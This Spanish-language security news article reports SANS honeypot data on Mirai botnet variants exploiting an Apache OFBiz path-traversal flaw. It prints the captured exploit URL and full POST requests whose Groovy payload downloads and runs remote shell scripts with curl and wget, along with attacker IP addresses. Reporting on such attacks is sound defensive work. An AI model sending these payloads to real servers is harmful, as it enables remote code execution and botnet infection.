02 de agosto de 2024The Hacker NewsVulnerabilidad / Seguridad de la red El software de planificación de recursos empresariales (ERP) es la base de muchas empresas que respaldan los recursos humanos, la contabilidad, el envío y la fabricación. Estos sistemas pueden volverse muy complejos y difíciles de mantener. A menudo están altamente personalizados, lo que puede dificultar la aplicación de parches. Sin embargo, las vulnerabilidades críticas siguen afectando a estos sistemas y ponen en riesgo los datos comerciales críticos. El SANS Internet Storm Center publicó un informe que muestra cómo el marco ERP de código abierto OFBiz es actualmente el objetivo de nuevas variedades de la botnet Mirai. Como parte de su amplia cartera de proyectos, la Fundación Apache apoya OFBiz, un marco basado en Java para crear aplicaciones ERP (planificación de recursos empresariales). OFBiz parece ser mucho menos frecuente que las alternativas comerciales. Sin embargo, al igual que con cualquier otro sistema ERP, las organizaciones dependen de él para los datos comerciales confidenciales, y la seguridad de estos sistemas ERP es fundamental. En mayo de este año, se lanzó una actualización de seguridad crítica para OFBiz. La actualización corrigió una vulnerabilidad de navegación de directorios que podría llevar a la ejecución remota de comandos. Las versiones de OFBiz anteriores a la 18.12.13 se vieron afectadas. Unas semanas más tarde, se hicieron públicos los detalles sobre la vulnerabilidad. Las vulnerabilidades de navegación de directorios, o de navegación de rutas, se pueden utilizar para eludir las reglas de control de acceso. Por ejemplo, si un usuario puede acceder a un directorio «/public» pero no a un directorio «/admin», un atacante puede utilizar una URL como «/public/../admin» para engañar a la lógica de control de acceso. Recientemente, CISA y el FBI publicaron una alerta como parte de la iniciativa «Secure by Design», centrada en la navegación de directorios. CISA señaló que actualmente están rastreando 55 vulnerabilidades de navegación de directorios como parte del catálogo «Known Exploited Vulnerabilities» (KEV). En el caso de OFBiz, la navegación de directorios se activa fácilmente insertando un punto y coma. Todo lo que tiene que encontrar un atacante es una URL a la que pueda acceder y añadir un punto y coma seguido de una URL restringida. La URL de explotación que vemos actualmente es: /webtools/control/forgotPassword;/ProgramExport Debido a que los usuarios deben poder restablecer las contraseñas sin iniciar sesión primero, «forgotPassword» no requiere ninguna autenticación. «ProgramExport», por otro lado, debe tener control de acceso y no debe ser accesible a menos que el usuario haya iniciado sesión. «ProgramExport» es particularmente peligroso porque permite la ejecución de código arbitrario. La lógica defectuosa en OFBiz dejó de evaluar la URL en el punto y coma. Esto permitió que cualquier usuario, sin iniciar sesión, accediera a la segunda parte de la URL, «/ProgramExport». Un atacante debe usar una solicitud POST para explotar la vulnerabilidad, pero no necesita necesariamente un cuerpo de solicitud. En cambio, un parámetro de URL funcionará perfectamente. El SANS Internet Storm Center utiliza una extensa red de honeypots para detectar intentos de explotar una amplia gama de vulnerabilidades de aplicaciones web. Los nuevos intentos de explotación significativos se resumen en un informe «First Seen». Este fin de semana, estos sensores detectaron un aumento significativo en los intentos de explotar CVE-2024-32213, la vulnerabilidad de navegación de directorios mencionada anteriormente por OFBiz, que fue inmediatamente detectada por el informe «First Seen». Los intentos de explotación se originaron desde dos direcciones IP diferentes que también estaban asociadas con varios intentos de explotar dispositivos IoT, comúnmente asociados con las variedades actuales de la botnet «Mirai». Los malhechores utilizaron dos versiones del exploit. El primero usó la URL para incluir el comando que el exploit pretendía ejecutar: POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception(‘curl https://95.214.27.196/where/bin.sh El segundo usó el cuerpo de la solicitud para el comando, que es más común para solicitudes «POST»: POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0 Host: [victim IP address]
Accept: */* Upgrade-Insecure-Requests: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 147 groovyProgram=throw+new+Exception(‘curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz’.execute().text); Lamentablemente, ni el script «bin.sh» ni el «sh» se recuperaron. Las direcciones IP estuvieron involucradas en escaneos el 29 de julio, usando el agente de usuario «KrebsOnSecurity», un guiño al blogger de seguridad de la información Brian Krebs. Sin embargo, las URL escaneadas eran en su mayoría parásitas, en busca de shells web existentes dejados por ataques anteriores. La dirección IP también se usó para distribuir un archivo llamado «botx.arm». Este nombre de archivo suele asociarse con variantes de Mirai. Con el anuncio de la vulnerabilidad en mayo, hemos estado esperando algunos análisis para aprovechar la vulnerabilidad de OFBiz. La explotación fue trivial y, si bien la población vulnerable y expuesta es pequeña, esto no ha detenido a los atacantes en el pasado. Pero ahora al menos están experimentando y tal vez agregando la vulnerabilidad a bots como variantes de Mirai. Solo hay algunas IP involucradas: 95.214.27.196: Envía el exploit como parámetro de URL y aloja malware. 83.222.191.62: Envía el exploit como cuerpo de la solicitud. Malware alojado en 185.196.10.231. A principios de julio, esta IP se escaneó en busca de vulnerabilidades de IoT.185.196.10.231: hospedaje de malware Si este artículo le resultó interesante y le gustaría profundizar más en el mundo de la protección de aplicaciones web, API y microservicios, puede unirse a mí en Network Security 2024 (del 4 al 9 de septiembre) para mi curso, SEC522. Vea todo lo que se ofrece en el evento aquí. ¿Le resultó interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síganos en Twitter  y LinkedIn para leer más contenido exclusivo que publicamos.